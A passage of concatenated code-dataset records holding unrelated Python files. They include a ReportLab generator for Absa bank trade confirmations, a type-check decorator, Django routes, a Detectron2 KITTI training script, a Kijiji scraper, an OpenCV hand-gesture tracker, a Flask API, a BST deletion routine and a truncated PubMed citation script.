para10,\\\n para11, para12, para13, para14, para15,\\\n para16, para17, para18]\n \n frame.addFromList(mydata, canvas) \n canvas.showPage()\n \ndef AccountDetails(canvas, t):\n\n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 27.43*cm, '8.')\n canvas.setFont(\"Helvetica-Bold\", 8.0)\n canvas.drawString(2.0 * cm, 27.43*cm, 'Account Details')\n canvas.drawString(2.0 * cm, 26.5*cm, 'Payment to ABSA:')\n \n canvas.setFont(\"Helvetica\", 10.0)\n canvas.drawString(2.5 * cm, 26.0*cm, 'Name of Account:')\n canvas.drawString(2.5 * cm, 25.5*cm, 'Account Number:')\n canvas.drawString(2.5 * cm, 25.0*cm, 'Branch Code:')\n \n #ABSA Account Details\n canvas.drawString(6.5 * cm, 26.0*cm, 'Absadirect - ABSAZAJJ')\n canvas.drawString(6.5 * cm, 25.5*cm, '660 158 642')\n canvas.drawString(6.5 * cm, 25.0*cm, '632505')\n \n canvas.setFont(\"Helvetica-Bold\", 10.0)\n canvas.drawString(2.0 * cm, 23.5*cm, 'Payment to Counterparty:')\n \n #Counterparty Account Number\n act = t.counterparty_ptynbr.accounts()\n CPAccountNumber = ' '\n for acc in act:\n CPAccountNumber = str(acc.account)\n canvas.setFont(\"Helvetica\", 10.0)\n canvas.drawString(2.0 * cm, 23.0*cm, 'Please provide payment details to ABSA by sending it to facsimile number +27 11 350-7941, for attention ')\n canvas.drawString(2.0 * cm, 22.6*cm, 'Settlements Department')\n \n \n canvas.drawString(1.5 * cm, 21.0*cm, '9.')\n canvas.setFont(\"Helvetica-Bold\", 10.0)\n canvas.drawString(2.0 * cm, 21.0*cm, 'Offices')\n canvas.drawString(2.0 * cm, 20.5*cm, 'ABSA:')\n \n canvas.setFont(\"Helvetica\", 10.0)\n canvas.drawString(2.0 * cm, 20.0*cm, 'Third Floor(3S) Absa Towers North')\n canvas.drawString(2.0 * cm, 19.5*cm, '180 Commissioner Street')\n canvas.drawString(2.0 * cm, 19.0*cm, 'Johannesburg 2001')\n canvas.drawString(2.0 * cm, 18.5*cm, 'South Africa')\n \n canvas.setFont(\"Helvetica-Bold\", 10.0)\n canvas.drawString(2.0 * cm, 17.5*cm, 'Counterparty:')\n canvas.drawString(2.0 * cm, 17.0*cm, t.counterparty_ptynbr.fullname)\n \n\n\ndef ShortMod6(canvas, t):\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n h1 = styleSheet['Heading3']\n Text2 = (' ')\n \n Text1 =('Upon receipt hereof, the Counterparty hereby agrees to review this Confirmation (Ref No. '+ str(t.trdnbr)+')\\\n and to either ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =350,\\\n alignment = 4)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas)\n\ndef ShortMod7(canvas):\n\n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text2 = (' ')\n Text1 =('i)\tnotify ABSA of any errors or discrepancies; or ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12,\\\n spaceAfter =375, alignment = 4)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas)\n \ndef ShortMod8(canvas):\n \n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.5 * cm, 13.58*cm, 'ii)')\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text2 = (' ')\n \n Text1 =(' confirm that the foregoing correctly sets forth the terms of the agreement between us with\\\n respect to this particular Transaction to which this Confirmation relates by signing this Confirmation\\\n and returning to facsimile +27 11 350-7941, attention Derivative Confirmations Division; or ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =390,\\\n alignment = 4, leftIndent = 10)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n \n frame.addFromList(mydata, canvas) \n \ndef ShortMod9(canvas):\n\n canvas.setFont(\"Helvetica\", 10.0) \n canvas.drawString(1.4*cm, 12.2*cm, 'iii)')\n \n frame = Frame(0.5*inch, 1*inch, 7*inch, 10*inch, showBoundary =0)\n \n styleSheet = getSampleStyleSheet() \n \n Text2 = (' ')\n \n Text1 =(' achieve an exchange of Confirmations as intended by Section 9(e)(ii) of the 2002 ISDA Form by\\\n sending an authorised Confirmation in ISDA format to facsimile number +27 11 350-7941, attention Derivative\\\n Confirmations Division. ')\n Text2 = ('')\n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=10, leading=12, spaceAfter =430\\\n , alignment = 4, leftIndent = 10)\n \n para2 = Paragraph(Text2, bodyStyle1)\n para1 = Paragraph(Text1, bodyStyle1)\n \n mydata = [para2, para1]\n frame.addFromList(mydata, canvas) \n \n canvas.showPage()\n \ndef Disclaimer(canvas):\n\n \n frame = Frame( 0.5*inch, \n 1*inch, \n 7*inch, \n 10*inch, \n showBoundary =0 \n )\n Text1 =('THIS IS AN IMPORTANT NOTICE - PLEASE READ CAREFULLY')\n Text3 =('The information disclosures provided by you were used to conclude this transaction to ensure that your\\\n financial needs and objectives were met. You acknowledge that the product is appropriate and adequate\\\n and no advice, as defined by Financial Advisory and Intermediary Services Act, 37 of 2002 (FAIS) was \\\n required to be provided by Absa Bank Limited (\"Absa Bank\") to you. The investment/transaction/products \\\n may involve a high degree of risk including, but not limited to, the risk of (a) low or no investment\\\n returns, (b) capital loss, (c) counterparty or issuer default, (d) adverse or unanticipated financial \\\n market fluctuations, (e) inflation and (f) currency exchange. The value of any investment/transaction\\\n (product) may fluctuate daily as a result of these risks. Absa Bank does not predict any (actual) results,\\\n performances and/or financial returns and gives no assurances, warranties or guarantees in this regard.\\\n Any information on past financial returns, modeling or back-testing is no indication of future returns\\\n or performance.')\n \n Text4 =('Please take note of the following:') \n \n Text5 =('1.The Financial Services Provider, Absa Bank is a duly authorised Category 1 Financial Services Provider.') \n \n Text6 =('2.Complaints:')\n \n Text7 =('2.1 Should you be dissatisfied with the service rendered by the Absa representative, you may lodge\\\n a complaint with Action Line on the following number: 0800 414141 or fax 012 367 1212. The complaints\\\n policy and procedure is available to you upon request.')\n \n Text8 =('2.2 Should you be dissatisfied with the outcome communicated to you in writing as the investigation may \\\n be unfavourable to you, you may, within six months of receiving the written notice, pursue the complaint \\\n with the relevant Ombuds office. The Ombuds contact details are:\\\n Tel:\t0860FAISOM / 0860324766\tFax:\t012 348 3447\\\n Email:\tinfo@faisombud.co.za')\n \n Text9 =('3.\tAbsa Bank has professional indemnity insurance cover.')\n Text10 =('4.Absa Bank does not assume responsibility for the performance of investments nor for the timing of portfolio changes.')\n \n Text12 =('5.The details of the Absa Bank Compliance Department are as follows:\\\n Tel:\t 011 350 4355\tFax:\t011 350 7419')\n \n Text13 =('6.The financial service rendered was in accordance with the FAIS Act General code of conduct.') \n Text14 =('7.The Absa Bank Representative has been registered with the Financial Services Board.') \n Text15 =('8.The Absa Bank representative has utilised his or her professional knowledge and ability to provide\\\n the appropriate service to you and has taken all reasonable steps to ensure your fair treatment.')\n Text16 =('9.The Absa Bank representative declared that he/she is a permanent employee and declared that no\\\n other personal interest in concluding this transaction exists. Further, there are no circumstances\\\n that may give rise to an actual or potential conflict of interest.') \n Text17 =('10.The Absa Bank representative declared that, should a personal interest exist (other than the receipt \\\n of commission and/or fees), he/she undertook to inform the customer of the nature of the conflict and \\\n take all reasonable steps to ensure fair treatment to the customer. ') \n Text18 =('11.Should you encounter a possible misrepresentation, non-disclosure of a material fact or the \\\n inclusion of incorrect information, please communicate this incident in writing to the Absa Action Line.') \n Text19 =('12.In the event that the financial product recommended is a replacement product the Absa Representative\\\n fully disclosed to you the actual and potential financial implications, costs and consequences of such\\\n a replacement.') \n Text20 =('13.In the event that a full analysis could not be undertaken there may be limitations on the\\\n appropriateness of the financial product you selected. You should take particular care to consider\\\n on your own whether the financial product is appropriate considering your objectives, financial \\\n situation and particular needs.')\n\n \n bodyStyle1 = ParagraphStyle('Text', spaceBefore=100, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 120)\n bodyStyle2 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle3 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle4 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15)\n bodyStyle5 = ParagraphStyle('Text', spaceBefore=4, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 40)\n bodyStyle6 = ParagraphStyle('Text', spaceBefore=2, fontName='Helvetica', fontSize=7, leading=12, spaceAfter =0,\\\n alignment = 4, leftIndent = 15) \n \n para1 = Paragraph(Text1, bodyStyle1)\n para3 = Paragraph(Text3, bodyStyle2)\n para4 = Paragraph(Text4, bodyStyle3)\n para5 = Paragraph(Text5, bodyStyle4)\n para6 = Paragraph(Text6, bodyStyle4)\n para7 = Paragraph(Text7, bodyStyle5)\n para8 = Paragraph(Text8, bodyStyle5)\n para9 = Paragraph(Text9, bodyStyle3)\n para10 = Paragraph(Text10, bodyStyle3)\n para12 = Paragraph(Text12, bodyStyle3)\n para13 = Paragraph(Text13, bodyStyle6)\n para14 = Paragraph(Text14, bodyStyle6)\n para15 = Paragraph(Text15, bodyStyle6)\n para16 = Paragraph(Text16, bodyStyle6)\n para17 = Paragraph(Text17, bodyStyle6)\n para18 = Paragraph(Text18, bodyStyle6)\n para19 = Paragraph(Text19, bodyStyle6)\n para20 = Paragraph(Text20, bodyStyle6)\n \n mydata = [para1, para3, para4, para5, para6, para7, para8, para9, para10,\\\n para12, para13, para14, para15, para16, para17, para18, para19, para20]\n \n frame.addFromList(mydata, canvas) \n","sub_path":"Python modules/ShortFormLegal.py","file_name":"ShortFormLegal.py","file_ext":"py","file_size_in_byte":30246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"300372618","text":"from functools import wraps\n\ndef unexpected_type(name, exp, val):\n if isinstance(exp, tuple):\n exp = ' '.join(['%s or' % x for x in exp[:-1]]) + '%s' % exp[-1]\n raise TypeError('expected \"%s\" to be %s, got %s' % (name, exp, type(val)))\n\ndef has_valid_type(argname, argtypes, val):\n for argtype in argtypes:\n if isinstance(val, argtype):\n return\n unexpected_type(argname, argtypes, val)\n\ndef argtypes(**decls):\n\n def decorator(f):\n code = f.__code__\n names = code.co_varnames[:code.co_argcount]\n\n @wraps(f)\n def decorated(*args, **kwargs):\n for argname, argtypes in decls.items():\n try:\n val = args[names.index(argname)]\n except (IndexError, ValueError):\n val = kwargs.get(argname)\n if argtypes == callable:\n if not callable(val):\n unexpected_type(argname, 'function', val)\n elif isinstance(argtypes, tuple):\n if argtypes == ():\n raise ValueError('argtypes cannot be empty tuple')\n has_valid_type(argname, argtypes, val)\n elif not isinstance(val, argtypes):\n unexpected_type(argname, argtypes, val)\n return f(*args, **kwargs)\n return decorated\n return decorator","sub_path":"argtypes/argtypes.py","file_name":"argtypes.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"311943025","text":"from django.urls import path\nfrom .views import ProveedorView, ProveedorNew, ProveedorEdit, proveedorInactivar,\\\n ComprasView, compras\n\nurlpatterns = [\n\n path('proveedor/', ProveedorView.as_view(), name='proveedor_list'),\n path('proveedor/new', ProveedorNew.as_view(), name='proveedor_new'),\n path('proveedor/edit/', ProveedorEdit.as_view(), name='proveedor_edit'),\n path('proveedor/inactivar/', proveedorInactivar, name='proveedor_inactivar'),\n\n path('compras/', ComprasView.as_view(), name='compras_list'),\n path('compras/new',compras, name=\"compras_new\"),\n]","sub_path":"cmp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"28842507","text":"import os\nimport numpy as np\nimport cv2\nimport torch\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor, DefaultTrainer\nfrom detectron2.data import DatasetCatalog\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer, ColorMode\nfrom detectron2.data import MetadataCatalog, build_detection_test_loader\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.modeling import build_model\nfrom detectron2.checkpoint import DetectionCheckpointer\n\nfrom .utils import KittiMots\nfrom .utils import KITTI_CATEGORIES, TEST_INFERENCE_VALUES\nfrom .utils import ValidationLoss, plot_validation_loss\n\n\ndef experiment_3(exp_name, model_file, checkpoint=None):\n\n print('Running Task B experiment', exp_name)\n SAVE_PATH = os.path.join('./results_week_6_task_b', exp_name)\n os.makedirs(SAVE_PATH, exist_ok=True)\n\n # Loading data\n print('Loading data')\n kittiloader = KittiMots()\n def rkitti_train(): return kittiloader.get_dicts(flag='train', method='complete', percentage= 1.0)\n def rkitti_val(): return kittiloader.get_dicts(flag='val')\n def rkitti_test(): return kittiloader.get_dicts(flag='test')\n DatasetCatalog.register('KITTI_train', rkitti_train)\n MetadataCatalog.get('KITTI_train').set(thing_classes=list(KITTI_CATEGORIES.keys()))\n DatasetCatalog.register('KITTI_val', rkitti_val)\n MetadataCatalog.get('KITTI_val').set(thing_classes=list(KITTI_CATEGORIES.keys()))\n DatasetCatalog.register('KITTI_test', rkitti_test)\n MetadataCatalog.get('KITTI_test').set(thing_classes=list(KITTI_CATEGORIES.keys()))\n\n # Load model and configuration\n print('Loading Model')\n cfg = get_cfg()\n cfg.merge_from_file(model_zoo.get_config_file(model_file))\n cfg.DATASETS.TRAIN = ('KITTI_train', )\n cfg.DATASETS.TEST = ('KITTI_val', )\n cfg.DATALOADER.NUM_WORKERS = 4\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5\n cfg.OUTPUT_DIR = SAVE_PATH\n if checkpoint:\n last_checkpoint = torch.load(checkpoint)\n new_path = checkpoint.split('.')[0]+'_modified.pth'\n last_checkpoint['iteration'] = -1\n torch.save(last_checkpoint,new_path)\n cfg.MODEL.WEIGHTS = new_path\n else:\n raise ValueError('You forgot to put the chekpoint for this experiment')\n cfg.SOLVER.IMS_PER_BATCH = 4\n cfg.SOLVER.BASE_LR = 0.00025\n cfg.SOLVER.MAX_ITER = 4000\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 256\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = 3\n cfg.TEST.SCORE_THRESH = 0.5\n\n # Training\n print('Training')\n trainer = DefaultTrainer(cfg)\n val_loss = ValidationLoss(cfg)\n trainer.register_hooks([val_loss])\n trainer._hooks = trainer._hooks[:-2] + trainer._hooks[-2:][::-1]\n trainer.resume_or_load(resume=False)\n trainer.train()\n\n # Evaluation\n print('Evaluating')\n cfg.DATASETS.TEST = ('KITTI_test', )\n evaluator = COCOEvaluator('KITTI_test', cfg, False, output_dir=SAVE_PATH)\n trainer.model.load_state_dict(val_loss.weights)\n trainer.test(cfg, trainer.model, evaluators=[evaluator])\n print('Plotting losses')\n plot_validation_loss(cfg, cfg.SOLVER.MAX_ITER, exp_name, SAVE_PATH, 'validation_loss.png')\n\n # Qualitative results: visualize some results\n print('Getting qualitative results')\n predictor = DefaultPredictor(cfg)\n predictor.model.load_state_dict(trainer.model.state_dict())\n inputs = rkitti_test()\n inputs = [inputs[i] for i in TEST_INFERENCE_VALUES]\n for i, input in enumerate(inputs):\n file_name = input['file_name']\n print('Prediction on image ' + file_name)\n img = cv2.imread(file_name)\n outputs = predictor(img)\n v = Visualizer(\n img[:, :, ::-1],\n metadata=MetadataCatalog.get(cfg.DATASETS.TRAIN[0]),\n scale=0.8,\n instance_mode=ColorMode.IMAGE)\n v = v.draw_instance_predictions(outputs['instances'].to('cpu'))\n cv2.imwrite(os.path.join(SAVE_PATH, 'Inference_' + exp_name + '_inf_' + str(i) + '.png'), v.get_image()[:, :, ::-1])","sub_path":"Week6/TaskB/src/experiment_3.py","file_name":"experiment_3.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"82742948","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nsession_requests = requests.session()\r\n\r\n\r\n# numPages - the number of pages from Kijijii that are parsed\r\n# city - name of the city the listings are being pulled from (must match a name in the dictionary below)\r\n# Returns - an array of strings representing the URLs of each listing (each listing has its own page on Kijiji\r\ndef listings(city, numPages):\r\n arr = []\r\n \r\n # retrive general structure of url for kijiji page from city\r\n value = mapping[city]\r\n \r\n # array of url of pages that contain listings\r\n pages = map(lambda y: value[0] + str(y) + value[1], range(1, numPages + 1)) \r\n \r\n # iterate through every page\r\n for x in pages:\r\n \r\n kijijii = session_requests.get(x)\r\n \r\n soup = BeautifulSoup(kijijii.text,'html.parser')\r\n \r\n # grab every tag that represents a listing on the page (tag can change over time)\r\n postings = soup.find_all(\"a\", class_= \"title \")\r\n \r\n # add every listing on the page to arr\r\n arr = arr + list(map(lambda v: \"https://www.kijiji.ca\" + v[\"href\"], postings))\r\n \r\n return arr\r\n\r\n# The following is a dictionary maintained to map each city to it's corresponding Kijijii URL\r\nmapping = {\r\n \"Toronto\" : [\"https://www.kijiji.ca/b-apartments-condos/gta-greater-toronto-area/page-\", \"/c37l1700272\"]\r\n }","sub_path":"Mapping.py","file_name":"Mapping.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"163160819","text":"\"\"\"\nIncludes demos of gesture tracking and recognition as required in video.\n\"\"\"\nimport cv2\nimport numpy as np\n\ndef resize(img, scale=0.5):\n width = int(img.shape[1] * scale)\n height = int(img.shape[0] * scale)\n dim = (width, height)\n # resize image\n return cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n\ndef imshow_smaller(title, img, scale=0.75):\n img_small = resize(img, scale=scale)\n cv2.imshow(title, img_small)\n\ndef add_text(img, text, location, scale=1):\n cv2.putText(img, text, location, cv2.FONT_HERSHEY_COMPLEX, scale, [max_color,0,max_color], thickness=3)\n\ndef add_text_top_left(img, text, scale=1):\n add_text(img, text, (50, 50), scale=scale)\n\ndef add_text_bottom_left(img, text, scale=1):\n add_text(img, text, (50, 670), scale=scale)\n\ndef hsv_and_ycrcb_mask(frame):\n lower_HSV = np.array([0, 40, 0], dtype = \"uint8\")\n upper_HSV = np.array([25, 255, 255], dtype = \"uint8\")\n \n converted_HSV = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n skin_mask_HSV = cv2.inRange(converted_HSV, lower_HSV, upper_HSV)\n\n lower_YCrCb = np.array([0, 138, 67], dtype = \"uint8\")\n upper_YCrCb = np.array((255, 173, 133), dtype = \"uint8\")\n \n converted_YCrCb = cv2.cvtColor(frame, cv2.COLOR_BGR2YCrCb)\n skin_mask_YCrCb = cv2.inRange(converted_YCrCb, lower_YCrCb, upper_YCrCb)\n \n return cv2.add(skin_mask_HSV, skin_mask_YCrCb)\n\ndef blur_noise(frame, skin_mask):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7))\n skin_mask = cv2.erode(skin_mask, kernel, iterations = 2)\n skin_mask = cv2.dilate(skin_mask, kernel, iterations = 2)\n \n # Blur the mask to help remove noise, then apply the mask to the frame.\n skin_mask = cv2.GaussianBlur(skin_mask, (3, 3), 0)\n return cv2.bitwise_and(frame, frame, mask=skin_mask)\n\ndef threshold_binarize(frame, invert=False):\n \"\"\" Returns the threshold value and the binarized image. \"\"\"\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n thresh_type = (cv2.THRESH_BINARY_INV if invert else 0) + cv2.THRESH_OTSU\n return cv2.threshold(gray, 0, max_color, thresh_type)\n\ndef get_connected_components(frame):\n ret, markers, stats, centroids = cv2.connectedComponentsWithStats(frame, ltype=cv2.CV_16U)\n markers = np.array(markers, dtype=np.uint8)\n label_hue = np.uint8(179 * markers / np.max(markers))\n blank_ch = max_color * np.ones_like(label_hue)\n labeled_img = cv2.merge([label_hue, blank_ch, blank_ch])\n labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_HSV2BGR)\n labeled_img[label_hue==0] = 0\n return ret, stats, labeled_img\n\ndef detect_hand_ellipse_hole(binary_frame, annotate=False):\n \"\"\"\n Returns the ellipse center, minor and major axis lengths, angle, and annotated frame.\n Tries to detect a hole in the hand gesture, and if detected returns the parameters of\n an ellipse matching the contour. If no ellipse detected, returns 0 for all parameters.\n If annotate, display ellipse in a separate window.\n \"\"\"\n ret, stats, labeled_img = get_connected_components(binary_frame)\n c_x, c_y, MA, ma, angle, frame = 0, 0, 0, 0, 0, binary_frame\n if ret <= 2:\n return c_x, c_y, MA, ma, angle, frame\n if annotate:\n frame = cv2.cvtColor(binary_frame, cv2.COLOR_GRAY2RGB) # Convert back to color.\n try:\n stats_sorted_by_area = stats[np.argsort(stats[:, 4])]\n roi = stats_sorted_by_area[-3][0:4]\n x, y, w, h = roi\n subimg = labeled_img[y:y+h, x:x+w]\n subimg = cv2.cvtColor(subimg, cv2.COLOR_BGR2GRAY)\n contours, _ = cv2.findContours(subimg, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n max_contour = max(contours, key=len)\n (c_x,c_y), (MA,ma), angle = cv2.fitEllipse(max_contour)\n c_x, c_y, MA, ma, angle = round(x + c_x), round(y + c_y), round(MA, 1), round(ma, 1), round(angle, 1)\n\n if annotate:\n if len(max_contour) >= 5:\n ellipseParam = cv2.fitEllipse(max_contour)\n subimg = cv2.cvtColor(subimg, cv2.COLOR_GRAY2RGB)\n subimg = cv2.ellipse(subimg, ellipseParam, (0,max_color,0), 2) # Add green ellipse.\n cv2.circle(frame, (c_x, c_y), 5, [max_color,0,max_color], -1) # Purple center.\n subimg = cv2.resize(subimg, (0,0), fx=3, fy=3)\n add_text_top_left(frame, f\"({c_x}, {c_y}); axes {MA}, {ma}; angle {angle}\")\n add_text_bottom_left(frame, f\"area {round(MA * ma)}; axis ratio {round(ma / MA, 3)}\")\n imshow_smaller(\"ROI 2\", subimg)\n except:\n if annotate:\n add_text_top_left(frame, \"No hand found\")\n return c_x, c_y, MA, ma, angle, frame\n\ndef detect_fingers(binary_frame, annotate=False):\n \"\"\"\n Returns number of fingers, area of hand, center of hand, and the annotated image.\n If cannot detect hand, returns 1 for number of fingers and 0 for other parameters.\n \"\"\"\n contours, _ = cv2.findContours(binary_frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n finger_count, area, cX, cY, frame = 1, 0, 0, 0, binary_frame\n if len(contours) <= 1:\n return finger_count, area, cX, cY, frame\n largest_contour = max(contours, key=cv2.contourArea)\n hull = cv2.convexHull(largest_contour, returnPoints = False)\n frame = binary_frame\n if annotate:\n frame = cv2.cvtColor(binary_frame, cv2.COLOR_GRAY2RGB) # Convert back to color.\n cv2.fillPoly(frame, pts=[largest_contour], color=[255,200,100]) # Fill largest contour with light blue.\n # Unless there are no fingers, the actual number is + 1 since we count valleys not fingers.\n for cnt in contours[:1]:\n try:\n defects = cv2.convexityDefects(cnt, hull)\n if defects is not None:\n for i in range(defects.shape[0]):\n s, e, f, d = defects[i,0]\n start = tuple(cnt[s][0])\n end = tuple(cnt[e][0])\n far = tuple(cnt[f][0])\n\n if annotate:\n cv2.line(frame, start, end, [0,max_color,0], 2) # Green convex hull.\n cv2.circle(frame, far, 5, [0,200,max_color], -1) # Orange points.\n\n if is_finger(start, end, far):\n finger_count += 1\n if annotate:\n cv2.circle(frame, far, 4, [0,0,max_color], -1) # Red finger valley.\n\n except cv2.error:\n pass\n M = cv2.moments(largest_contour)\n area = M[\"m00\"]\n cX = round(M[\"m10\"] / area)\n cY = round(M[\"m01\"] / area)\n if annotate:\n cv2.circle(frame, (cX, cY), 5, [max_color,0,max_color], -1) # Purple center.\n add_text_top_left(frame, f\"({cX}, {cY}); {finger_count} fingers; area {area}\")\n return finger_count, area, cX, cY, frame\n\ndef is_finger(start, end, far):\n c_squared = (end[0] - start[0])**2 + (end[1] - start[1])**2\n a_squared = (far[0] - start[0])**2 + (far[1] - start[1])**2\n b_squared = (end[0] - far[0])**2 + (end[1] - far[1])**2\n angle = np.arccos((a_squared + b_squared - c_squared ) / (2 * np.sqrt(a_squared * b_squared)))\n return angle <= np.pi / 3\n\n\nwindow_name = \"Hand Gesture Tracking\"\nmax_color = 255\nDETECT_HOLE = True # Used to switch between detecting hole and fingers.\n\nif __name__ == \"__main__\":\n cam = cv2.VideoCapture(0)\n cv2.namedWindow(window_name)\n\n print(\"Starting gesture detection\")\n while True:\n ret, frame = cam.read()\n if not ret:\n print(\"Could not find ret, exiting\")\n break\n\n skin_mask = hsv_and_ycrcb_mask(frame)\n frame = blur_noise(frame, skin_mask)\n\n if DETECT_HOLE:\n _, binary_frame = threshold_binarize(frame, invert=True)\n frame = detect_hand_ellipse_hole(binary_frame, annotate=True)[-1]\n else:\n _, binary_frame = threshold_binarize(frame, invert=False)\n frame = detect_fingers(binary_frame, annotate=True)[-1]\n\n imshow_smaller(window_name, frame)\n\n k = cv2.waitKey(1) # k is the key pressed.\n if k == 27 or k == 113: # 27, 113 are ascii for escape and q respectively.\n print(\"Received user input, exiting\")\n cv2.destroyAllWindows()\n cam.release()\n break\n\n","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"618572523","text":"#!flask/bin/python\nfrom flask import Flask, jsonify, request\nimport sys\n\n# change this in your own code; a litle hacky, I know.\nsys.path.insert(0,'')\nfrom challenge import scholarship_selection\n\napp = Flask(__name__)\narrays = []\n\n@app.route('/scholarship_api')\ndef index():\n\treturn \"scholarship arrays: {}\".format(arrays)\n\n@app.route('/scholarship_api/',methods=['GET'])\ndef answer(array_id):\n\tif not arrays:\n\t\treturn jsonify({'sequence': None, 'total': None})\n\n\tarray = [arr for arr in arrays if arr['id'] == array_id]\n\tanswer = scholarship_selection.scholarship_selection(array[0]['array'])\n\n\treturn jsonify(answer)\n\n@app.route('/scholarship_api', methods=['POST'])\ndef post_array():\n\t\n\tarray = {\n\t'id': arrays[-1]['id'] + 1 if arrays else 0,\n\t'array': request.json['array'],\n\t}\n\tarrays.append(array)\n\treturn jsonify(array), 201\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"scholarship_api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"460699513","text":"#Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n if root is None:\n return None\n\n # find the correct node\n if root.val > key:\n root.left = self.deleteNode(root.left, key)\n elif root.val < key:\n root.right = self.deleteNode(root.right, key)\n else:\n if root.left is None:\n return root.right\n elif root.right is None:\n return root.left\n \n replace_node = self.findMinLeft(root.right)\n root.val = replace_node.val\n root.right = self.deleteNode(root.right, root.val)\n\n return root\n\n def findMinLeft(self, root):\n if root is None:\n return None\n elif root.left is None:\n return root\n else:\n return self.findMinLeft(root.left)\n\n\nsol = Solution()\ntree = TreeNode(5)\ntree.left = TreeNode(3)\ntree.left.left = TreeNode(2)\ntree.left.right = TreeNode(4)\ntree.right = TreeNode(6)\ntree.right.right = TreeNode(7)\n","sub_path":"python/LeetCode/delete_bst_node.py","file_name":"delete_bst_node.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"452507787","text":"import pandas as pd\nimport requests\nimport time\n\ntrial_one_to_one_data = pd.read_csv('trial_mapped_one_nct_10thSept.csv')\nprint(trial_one_to_one_data.shape)\ncite_count_list = list()\npmid_list = list()\nnct_id_list = list()\n\nfor row_id in range(trial_one_to_one_data.shape[0]):\n pmid = trial_one_to_one_data.iloc[row_id, 0]\n nctid = trial_one_to_one_data.iloc[row_id, 1]\n\n if row_id % 20 == 0:\n print(row_id)\n store_db = pd.DataFrame({'pmid': pmid_list, 'cite_count': cite_count_list})\n store_db.to_csv('store_cite_nct_count_10thSept2020.csv', index=False)\n try:\n link = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/elink.fcgi?dbfrom=pubmed&linkname=pubmed_pubmed_citedin&id=\"+str(pmid)\n # link = \"https://www.ncbi.nlm.nih.gov/pubmed?linkname=pubmed_pubmed_citedin&from_uid=\" + str(item) + \"&report=uilist&format=tex\"\n # link = \"https://www.ncbi.nlm.nih.gov/pubmed?linkname=pubmed_pubmed_citedin&from_uid=\" + str(item) + 